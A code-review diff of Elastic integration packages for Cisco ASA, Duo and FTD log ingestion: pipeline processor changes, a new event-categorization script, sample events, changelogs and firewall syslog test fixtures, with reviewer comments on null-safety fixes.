error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" # # Geolocation for source and destination addresses # 
@@ -2193,24 +1943,12 @@ processors: tag: "grok_natsrcip" patterns: - "^(?:%{IP:_temp_.cisco.mapped_source_ip}|%{GREEDYDATA:_temp_.cisco.mapped_source_host})$" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: field: _temp_.natdstip if: ctx._temp_?.natdstip != null tag: "grok_natdstip" patterns: - "^(?:%{IP:_temp_.cisco.mapped_destination_ip}|%{GREEDYDATA:_temp_.cisco.mapped_destination_host})$" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # NAT fields # 
@@ -2218,38 +1956,46 @@ processors: # This populates both nat.ip and nat.port only when some translation is done. # Fills nat.ip and nat.port even when only the ip or port changed. - set: + tag: set_source_nat_ip field: source.nat.ip value: "{{{_temp_.cisco.mapped_source_ip}}}" if: "ctx?._temp_?.cisco?.mapped_source_ip != ctx?.source?.ip" ignore_empty_value: true - convert: + tag: convert_source_nat_ip field: source.nat.ip type: ip ignore_missing: true - set: + tag: set_source_nat_port field: source.nat.port value: "{{{_temp_.cisco.mapped_source_port}}}" if: "ctx?._temp_?.cisco?.mapped_source_port != ctx?.source?.port" ignore_empty_value: true - convert: + tag: convert_source_nat_port field: source.nat.port type: long ignore_missing: true - set: + tag: set_destination_nat_ip field: destination.nat.ip value: "{{{_temp_.cisco.mapped_destination_ip}}}" if: "ctx?._temp_?.cisco.mapped_destination_ip != ctx?.destination?.ip" ignore_empty_value: true - convert: + tag: convert_destination_nat_ip field: destination.nat.ip type: ip ignore_missing: true - set: + tag: set_destination_nat_port field: destination.nat.port value: "{{{_temp_.cisco.mapped_destination_port}}}" if: "ctx?._temp_?.cisco?.mapped_destination_port != ctx?.destination?.port" ignore_empty_value: true - convert: + tag: convert_destination_nat_port field: destination.nat.port type: long ignore_missing: true @@ -2327,10 +2073,6 @@ processors: field: url.original tag: "uriparts_url_original" if: ctx.url?.original != null - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - append: field: url.domain value: "{{{_temp_.url_domain}}}" 
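Review bot: The `set_destination_nat_ip` condition still reads `ctx?._temp_?.cisco.mapped_destination_ip` without the null-safe accessor after `cisco`, unlike its three siblings in this hunk, so an event that has no `_temp_.cisco` at this point throws instead of skipping; given the tags being added here to improve failure reporting, the one-line fix `if: "ctx?._temp_?.cisco?.mapped_destination_ip != ctx?.destination?.ip"` fits the change. Whether `_temp_.cisco` can be absent here depends on earlier processors outside the hunk, so treat it as a hardening rather than a confirmed crash.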
@@ -2351,14 +2093,7 @@ processors: field: _temp_.cisco target_field: "cisco.asa" if: ctx._temp_?.cisco != null - # - # Remove temporary fields - # - - remove: - field: - - _temp_ - - _conf - ignore_missing: true + # # Rename some 7.x fields # 
@@ -2368,154 +2103,331 @@ processors: ignore_missing: true # ECS categorization - script: + tag: script_ecs_categorization lang: painless + description: >- + This script will set the ECS event categorization fields for each + message type. If a message wrote to _temp_.outcome, the value of this + field will be used to conditionally set the ECS event fields. + The top-level keys are the Cisco message IDs. The next level of keys are + either the ECS event fields or in the case of _temp_.outcome being set, + the possible values of _temp_.outcome. In the latter case, the keys + contained within will be the ECS event fields. params: - connection-finished: - kind: event - category: - - network - type: - - end - connection-started: - kind: event - category: - - network - type: - - start - file-detected: - kind: alert - category: - - malware - type: - - info - firewall-rule: - kind: event - category: - - network - type: [] - flow-creation: - kind: event - category: - - network - type: - - connection - - start - flow-expiration: - kind: event - category: - - network - type: - - connection - - end - intrusion-detected: - kind: alert - category: - - intrusion_detection - type: - - info - logged-in: - kind: event - category: - - authentication - - network - type: ['allowed', 'info'] - logon-failed: - kind: event - category: - - authentication - - network - type: ['denied', 'info'] - malware-detected: - kind: alert - category: - - malware - type: - - info - bypass: - kind: event - category: - - network - type: - - info - error: - kind: event + "106001": + type: [ connection, denied ] + outcome: success + "106002": + type: [ connection, denied ] + outcome: success + "106006": + type: [ connection, denied ] + outcome: success + "106007": + type: [ connection, denied ] + outcome: success + "106010": + type: [ connection, denied ] + outcome: success + "106013": + type: [ connection, denied ] + outcome: success + "106014": + type: [ connection, denied ] + outcome: success + 
"106015": + type: [ connection, denied ] + outcome: success + "106016": + type: [ connection, denied ] + outcome: success + "106017": + type: [ connection, denied ] + outcome: success + "106018": + type: [ connection, denied ] + outcome: success + "106020": + type: [ connection, denied ] + outcome: success + "106021": + type: [ connection, denied ] + outcome: success + "106022": + type: [ connection, denied ] + outcome: success + "106023": + type: [ connection, denied ] + outcome: success + "106027": + type: [ connection, denied ] + outcome: success + "106100": + denied: + type: [ connection, denied ] + action: firewall-rule + outcome: success + permitted: + type: [ connection, allowed ] + action: firewall-rule + outcome: success + est-allowed: + type: [ connection, allowed ] + action: firewall-rule + outcome: success + "106102": + denied: + type: [ connection, denied ] + action: firewall-rule + outcome: success + permitted: + type: [ connection, allowed ] + action: firewall-rule + outcome: success + "106103": + type: [ connection, denied ] + outcome: success + "110002": + type: [ connection, denied ] + outcome: failure + "111004": + failed: + outcome: failure + ok: + outcome: success + "113004": + category: [ authentication, network ] + type: [ allowed, info ] + action: logged-in + outcome: success + "113005": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed + outcome: failure + "113012": + category: [ authentication, network ] + type: [ allowed, info ] + action: logged-in + outcome: success + "113019": + type: [ connection, end ] + action: client-vpn-disconnected + "113021": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed + outcome: failure + "113029": + type: [ connection, denied ] + action: client-vpn-error + "113030": + type: [ connection, denied ] + action: client-vpn-error + "113031": + type: [ connection, denied ] + action: client-vpn-error + "113032": + type: [ connection, 
denied ] + action: client-vpn-error + "113033": + type: [ connection, denied ] + action: client-vpn-error + "113034": + type: [ connection, denied ] + action: client-vpn-error + "113035": + type: [ connection, denied ] + action: client-vpn-error + "113036": + type: [ connection, denied ] + action: client-vpn-error + "113037": + type: [ connection, denied ] + action: client-vpn-error + "113038": + type: [ connection, denied ] + action: client-vpn-error + "113039": + category: [ network, session ] + type: [ connection, start ] + action: client-vpn-connected + "113040": + type: [ connection, denied ] + action: client-vpn-error + "302014": + type: [ connection, end ] + action: flow-expiration + "302016": + type: [ connection, end ] + action: flow-expiration + "302018": + type: [ connection, end ] + action: flow-expiration + outcome: success + "302020": + type: [ connection, start ] + action: flow-creation + "302021": + type: [ connection, end ] + action: flow-expiration + "302036": + type: [ connection, end ] + action: flow-expiration + "302304": + type: [ connection, end ] + action: flow-expiration + "302306": + type: [ connection, end ] + action: flow-expiration + "304001": + type: [ connection, allowed ] + outcome: success + "304002": + type: [ connection, denied ] + outcome: success + "305012": + type: [ connection, end ] + action: flow-expiration + "313001": + type: [ connection, denied ] + outcome: success + "313004": + type: [ connection, denied ] + outcome: success + "313008": + type: [ connection, denied ] + outcome: success + "313009": + type: [ connection, denied ] + outcome: success + "322001": + type: [ connection, denied ] + "338001": + type: [ connection ] + "338002": + type: [ connection, allowed ] + outcome: success + "338003": + type: [ connection ] + "338004": + category: [ network, intrusion_detection ] + outcome: success + "338005": + type: [ connection ] + "338006": + type: [ connection ] + "338007": + type: [ connection ] + "338008": + type: [ 
connection, denied ] + outcome: failure + "338101": + type: [ connection ] + "338102": + type: [ connection ] + "338103": + type: [ connection ] + "338104": + type: [ connection ] + "338201": + type: [ connection ] + "338202": + type: [ connection ] + "338203": + type: [ connection ] + "338204": + type: [ connection, denied ] + outcome: failure + "338301": + type: [ connection ] + "434002": + type: [ connection, denied ] + action: drop + outcome: unknown + "434004": + action: bypass + outcome: unknown + "502103": + category: [ iam ] + type: [ group, change ] + "602303": + type: [ connection, start ] + action: created + outcome: success + "602304": + type: [ info, end ] + action: deleted + outcome: success + "605004": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed outcome: failure - category: - - network - type: - - info - deleted: - kind: event - category: - - network - type: - - info - - end - creation: - kind: event - category: - - network - type: - - info - - access - client-vpn-connected: - kind: event - category: - - network - - session - type: - - connection - - start - client-vpn-error: - kind: event - category: - - network - type: - - connection - - denied - client-vpn-disconnected: - kind: event - category: - - network - type: - - connection - - end + "605005": + type: [ connection, allowed ] + outcome: success + "609001": + type: [ connection, end ] + action: flow-expiration + "609002": + type: [ connection, end ] + action: flow-expiration + "611101": + category: [ authentication, network ] + type: [ allowed, info ] + action: logged-in + outcome: success + "611102": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed + outcome: failure + "710003": + type: [ connection, denied ] + outcome: success + "710005": + type: [ connection, denied ] + outcome: failure + "713120": + outcome: success + "713901": + action: error + outcome: failure + "713902": + action: error + outcome: failure 
+ "713903": + outcome: failure + "713904": + action: error + outcome: failure + "713905": + action: error + outcome: failure + "716039": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed + outcome: failure + "734001": + category: [ authentication, network ] + type: [ allowed, info ] + action: logged-in + outcome: success + "750002": + type: [ start, connection ] + action: connection-started + "750003": + action: error source: >- - if (ctx?.event?.action == null || !params.containsKey(ctx.event.action)) { - return; - } - - ctx.event.kind = params.get(ctx.event.action).get('kind'); - ctx.event.category = params.get(ctx.event.action).get('category').clone(); - ctx.event.type = params.get(ctx.event.action).get('type').clone(); - if (ctx?.event?.outcome == null || (!ctx.event.category.contains('network') && !ctx.event.category.contains('intrusion_detection'))) { - if (ctx?.event?.action == 'firewall-rule') { - ctx.event.type.add('info'); - } else if (ctx?.event?.action.startsWith('connection-')) { - ctx.event.type.add('connection'); - } + if (ctx.event.code == null || !params.containsKey(ctx.event.code)) { return; } - if (ctx.event.outcome == 'allowed') { - ctx.event.outcome = 'success'; - ctx.event.type.add('connection'); - ctx.event.type.add('allowed'); - } else if (ctx.event.outcome == 'denied' || ctx.event.outcome == 'block') { - ctx.event.outcome = 'success'; - ctx.event.type.add('connection'); - ctx.event.type.add('denied'); - } else if (ctx.event.outcome == 'dropped') { - ctx.event.outcome = 'failure'; - ctx.event.type.add('connection'); - ctx.event.type.add('denied'); - } else if (ctx?.event?.action == 'firewall-rule') { - ctx.event.type.add('info'); - } else if (ctx?.event?.action.startsWith('connection-')) { - ctx.event.type.add('connection'); - } - if (ctx.event.outcome == 'monitored') { - ctx.event.category.add('intrusion_detection'); - ctx.event.outcome = 'success'; + if (ctx._temp_?.outcome == null) { + 
params.get(ctx.event.code).forEach((k, v) -> ctx.event[k] = v); + } else { + params.get(ctx.event.code).get(ctx._temp_.outcome).forEach((k, v) -> ctx.event[k] = v); } # Malware event kind is classified as alert when sha_disposition is "Malware", "Custom Detection" not for other cases. @@ -2543,15 +2455,12 @@ processors: - set: field: observer.vendor value: "Cisco" - ignore_empty_value: true - set: field: observer.type value: "firewall" - ignore_empty_value: true - set: field: observer.product value: "asa" - ignore_empty_value: true - set: field: observer.egress.interface.name value: "{{{ cisco.asa.destination_interface }}}" @@ -2636,6 +2545,7 @@ processors: if: ctx.destination?.user?.domain != null && ctx.destination?.user?.domain != '' allow_duplicates: false - script: + tag: script_remove_null_values lang: painless description: This script processor iterates over the whole document to remove fields with null values. source: | @@ -2675,6 +2585,12 @@ processors: if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" ignore_failure: true ignore_missing: true + - remove: + field: + - _temp_ + - _conf + ignore_missing: true + on_failure: # Copy any fields under _temp_.cisco to its final destination. Those can help # with diagnosing the failure. @@ -2692,5 +2608,5 @@ on_failure: field: event.kind value: pipeline_error - append: - field: "error.message" - value: "{{{ _ingest.on_failure_message }}}" + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/cisco_asa/data_stream/log/sample_event.json b/packages/cisco_asa/data_stream/log/sample_event.json index 0091d612d34..cbb3f7106cc 100644 --- a/packages/cisco_asa/data_stream/log/sample_event.json +++ b/packages/cisco_asa/data_stream/log/sample_event.json 
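Review bot: The new categorization script dereferences `params.get(ctx.event.code).get(ctx._temp_.outcome)` without checking that the outcome is actually a key, so a `_temp_.outcome` value the params do not list (anything other than `denied`/`permitted`/`est-allowed`/`failed`/`ok` for those codes, or any outcome at all for a field-keyed code such as `106001`) raises a null-pointer error and sends the whole event to the pipeline-level `on_failure`. The inverse case is also unhandled: when `_temp_.outcome` is null for an outcome-keyed code such as `106100`, the first branch copies the nested maps into `event.denied`, `event.permitted` and `event.est-allowed`. Two smaller points: the guard uses `ctx.event.code` rather than `ctx.event?.code` (the old script was null-safe on `event`), and the old code cloned the list values before assigning them while the new `forEach` assigns the params lists directly, so a later `append` on `event.type` would mutate shared state unless params are copied per execution — worth confirming. The `source:` block below keeps the lookup table as-is and only makes the selection defensive; the script's enclosing processor starts earlier in this hunk.
```yaml
      source: >-
        if (ctx.event?.code == null || !params.containsKey(ctx.event.code)) {
          return;
        }
        def entry = params.get(ctx.event.code);
        def outcome = ctx._temp_?.outcome;
        if (outcome != null && entry.containsKey(outcome)) {
          entry = entry.get(outcome);
        } else if (entry.values().stream().anyMatch(v -> v instanceof Map)) {
          // outcome-keyed entry with no matching outcome: leave categorization unset
          return;
        }
        entry.forEach((k, v) -> ctx.event[k] = v instanceof List ? new ArrayList(v) : v);
```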
@@ -1,11 +1,11 @@ { "@timestamp": "2018-10-10T12:34:56.000Z", "agent": { - "ephemeral_id": "9ff3fcbd-3ca0-4634-bbaa-604ac67b8188", - "id": "383c6290-eea2-4a18-8adf-2ed05723031e", + "ephemeral_id": "3e750a6f-0315-4d23-b673-90c997a5320b", + "id": "38e64915-8382-4988-ab00-33b6b749dcdb", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.3" + "version": "8.11.4" }, "cisco": { "asa": { @@ -28,9 +28,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "383c6290-eea2-4a18-8adf-2ed05723031e", + "id": "38e64915-8382-4988-ab00-33b6b749dcdb", "snapshot": false, - "version": "8.10.3" + "version": "8.11.4" }, "event": { "action": "firewall-rule", @@ -40,7 +40,7 @@ ], "code": "305011", "dataset": "cisco_asa.log", - "ingested": "2023-10-17T09:19:55Z", + "ingested": "2024-02-22T13:07:31Z", "kind": "event", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "severity": 6, @@ -53,12 +53,12 @@ "hostname": "localhost" }, "input": { - "type": "tcp" + "type": "udp" }, "log": { "level": "informational", "source": { - "address": "192.168.208.4:60290" + "address": "172.18.0.7:33197" } }, "network": { @@ -106,4 +106,4 @@ "cisco-asa", "forwarded" ] -} +} \ No newline at end of file diff --git a/packages/cisco_asa/docs/README.md b/packages/cisco_asa/docs/README.md index cc209e794fe..b267c02ca7a 100644 --- a/packages/cisco_asa/docs/README.md +++ b/packages/cisco_asa/docs/README.md @@ -17,11 +17,11 @@ An example event for `log` looks as following: { "@timestamp": "2018-10-10T12:34:56.000Z", "agent": { - "ephemeral_id": "9ff3fcbd-3ca0-4634-bbaa-604ac67b8188", - "id": "383c6290-eea2-4a18-8adf-2ed05723031e", + "ephemeral_id": "3e750a6f-0315-4d23-b673-90c997a5320b", + "id": "38e64915-8382-4988-ab00-33b6b749dcdb", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.3" + "version": "8.11.4" }, "cisco": { "asa": { 
@@ -44,9 +44,9 @@ An example event for `log` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "383c6290-eea2-4a18-8adf-2ed05723031e", + "id": "38e64915-8382-4988-ab00-33b6b749dcdb", "snapshot": false, - "version": "8.10.3" + "version": "8.11.4" }, "event": { "action": "firewall-rule", @@ -56,7 +56,7 @@ An example event for `log` looks as following: ], "code": "305011", "dataset": "cisco_asa.log", - "ingested": "2023-10-17T09:19:55Z", + "ingested": "2024-02-22T13:07:31Z", "kind": "event", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "severity": 6, @@ -69,12 +69,12 @@ An example event for `log` looks as following: "hostname": "localhost" }, "input": { - "type": "tcp" + "type": "udp" }, "log": { "level": "informational", "source": { - "address": "192.168.208.4:60290" + "address": "172.18.0.7:33197" } }, "network": { @@ -123,7 +123,6 @@ An example event for `log` looks as following: "forwarded" ] } - ``` **Exported fields** diff --git a/packages/cisco_asa/manifest.yml b/packages/cisco_asa/manifest.yml index 4b5400b8930..72107b5b429 100644 --- a/packages/cisco_asa/manifest.yml +++ b/packages/cisco_asa/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_asa title: Cisco ASA -version: "2.30.1" +version: "2.33.0" description: Collect logs from Cisco ASA with Elastic Agent. type: integration categories: diff --git a/packages/cisco_duo/changelog.yml b/packages/cisco_duo/changelog.yml index cea1bb9005d..e7d4afdeafb 100644 --- a/packages/cisco_duo/changelog.yml +++ b/packages/cisco_duo/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.22.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.21.1" changes: - description: Changed owners 
diff --git a/packages/cisco_duo/manifest.yml b/packages/cisco_duo/manifest.yml index 2c4242a6e2a..eaf1cf4f6b0 100644 --- a/packages/cisco_duo/manifest.yml +++ b/packages/cisco_duo/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cisco_duo title: Cisco Duo -version: "1.21.1" +version: "1.22.0" description: Collect logs from Cisco Duo with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - iam conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/cisco_duo-screenshot.png title: Cisco Duo authentication log dashboard @@ -49,6 +49,7 @@ policy_templates: title: Secret Key description: Secret key for the Cisco Duo Admin API. required: true + secret: true - name: interval type: text title: Interval diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml index ce74da81dd3..9103eb72852 100644 --- a/packages/cisco_ftd/changelog.yml +++ b/packages/cisco_ftd/changelog.yml 
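Review bot: Only the `Secret Key` variable gains `secret: true` in this hunk, while the accompanying changelog entry says "Set sensitive values as secret" in the plural; if the same policy template declares any other credential-bearing input outside this hunk, it should receive the same flag so it is stored in the Fleet secrets store rather than in the agent policy. The `conditions.kibana.version: ^8.12.0` bump is the right companion change since the `secret` attribute is not honoured by older stacks, and that dependency is worth a one-line comment next to the condition, e.g. `# ^8.12.0 required for secret: true on policy variables`.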
@@ -1,4 +1,39 @@ # newer versions go on top +- version: "3.2.4" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9569 +- version: "3.2.3" + changes: + - description: Treat FTD suffix as optional + type: bugfix + link: https://github.com/elastic/integrations/issues/9241 +- version: "3.2.2" + changes: + - description: Handle null network when calculating bytes for Event 113019 + type: bugfix + link: https://github.com/elastic/integrations/issues/9198 +- version: "3.2.1" + changes: + - description: support hidden username for message id 113005 + type: bugfix + link: https://github.com/elastic/integrations/pull/9473 +- version: "3.2.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "3.1.3" + changes: + - description: Expand grok patterns to handle TCP Probes for 302013, 302014 messages + type: enhancement + link: https://github.com/elastic/integrations/pull/9223 +- version: "3.1.2" + changes: + - description: Null handling and other clean-up + type: bugfix + link: https://github.com/elastic/integrations/pull/9141 - version: "3.1.1" changes: - description: Changed owners diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index d0c80a912bb..809c741fcbe 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -372,7 +372,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "ftd": { "icmp_code": 1, 
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log index 40c1e05dd0e..32f1d43c87b 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log @@ -1,3 +1,5 @@ <166>Sep 29 2022 15:00:15 hosty : %FTD-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF0079F5A) between 192.168.0.139 and 192.168.0.38 (user= 192.168.0.38) has been created. <166>Sep 29 2022 15:00:15 hosty : %FTD-6-602304: IPSEC: An inbound LAN-to-LAN SA (SPI= 0xEAEE970F) between 192.168.0.38 and 192.168.0.139 (user= 192.168.0.38) has been deleted. <166>ACA1a-FW-FTDV01 %FTD-6-113005: AAA user authentication Rejected : reason = AAA failure : server = 192.168.0.38 : user = scan : user IP = 192.168.0.139 +<166>%FTD-6-113005: AAA user authentication Rejected : reason = AAA failure : server = 192.168.0.38 : user = ***** : user IP = 192.168.0.139 +<166>:Feb 26 11:26:52 UTC: %FTD--6-852002: Received Full Proxy to Lightweight event from application Snort for TCP flow 10.10.10.10/710 to 11.22.33.44/47873 diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log-expected.json index bf2201630f5..6150aad4983 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log-expected.json 
@@ -206,6 +206,92 @@ "tags": [ "preserve_original_event" ] + }, + { + "destination": { + "address": "192.168.0.38", + "ip": "192.168.0.38" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "logon-failed", + "code": "113005", + "original": "<166>%FTD-6-113005: AAA user authentication Rejected : reason = AAA failure : server = 192.168.0.38 : user = ***** : user IP = 192.168.0.139", + "outcome": "failure", + "severity": 6, + "timezone": "UTC" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "observer": { + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "192.168.0.139", + "192.168.0.38" + ] + }, + "source": { + "address": "192.168.0.139", + "ip": "192.168.0.139" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "852002", + "kind": "event", + "original": "<166>:Feb 26 11:26:52 UTC: %FTD--6-852002: Received Full Proxy to Lightweight event from application Snort for TCP flow 10.10.10.10/710 to 11.22.33.44/47873", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "observer": { + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log index bb73701536a..3eee55ef038 100755 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log 
@@ -1,4 +1,8 @@ <166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Outside2:89.160.20.131/443 (89.160.20.131/443) <166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Outside1:89.160.20.131/443 (89.160.20.131/443) <166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Inside1:10.0.1.50/443 (89.160.20.131/443) -<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Inside2:10.0.1.50/443 (89.160.20.131/443) \ No newline at end of file +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Inside2:10.0.1.50/443 (89.160.20.131/443) +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Outside2:89.160.20.131/443 (89.160.20.131/443) +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Outside1:89.160.20.131/443 (89.160.20.131/443) +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Inside1:10.0.1.50/443 (89.160.20.131/443) +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Inside2:10.0.1.50/443 (89.160.20.131/443) \ No newline at end of file 
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log-expected.json index 9995e14cb08..e09b9e8ac87 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log-expected.json 
@@ -460,6 +460,467 @@ "preserve_original_event", "private_is_internal" ] + }, + { + "@timestamp": "2023-05-09T15:50:47.000Z", + "cisco": { + "ftd": { + "connection_id": "154498453", + "destination_interface": "Outside2", + "mapped_destination_ip": "89.160.20.131", + "mapped_destination_port": 443, + "mapped_source_ip": "175.16.199.6", + "mapped_source_port": 40846, + "source_interface": "Outside1" + } + }, + "destination": { + "address": "89.160.20.131", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.131", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "302013", + "kind": "event", + "original": "<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Outside2:89.160.20.131/443 (89.160.20.131/443)", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "fw-bld1-1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "network": { + "community_id": "1:kkkQlFDvK1ZyGot4PPZhg0/MqmI=", + "direction": "external", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "Outside2" + } + }, + "hostname": "fw-bld1-1", + "ingress": { + "interface": { + "name": "Outside1" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "fw-bld1-1" + ], + "ip": [ + "89.160.20.131", + "175.16.199.6" + ] + }, + "source": { + "address": "89.160.20.131", + "as": { + 
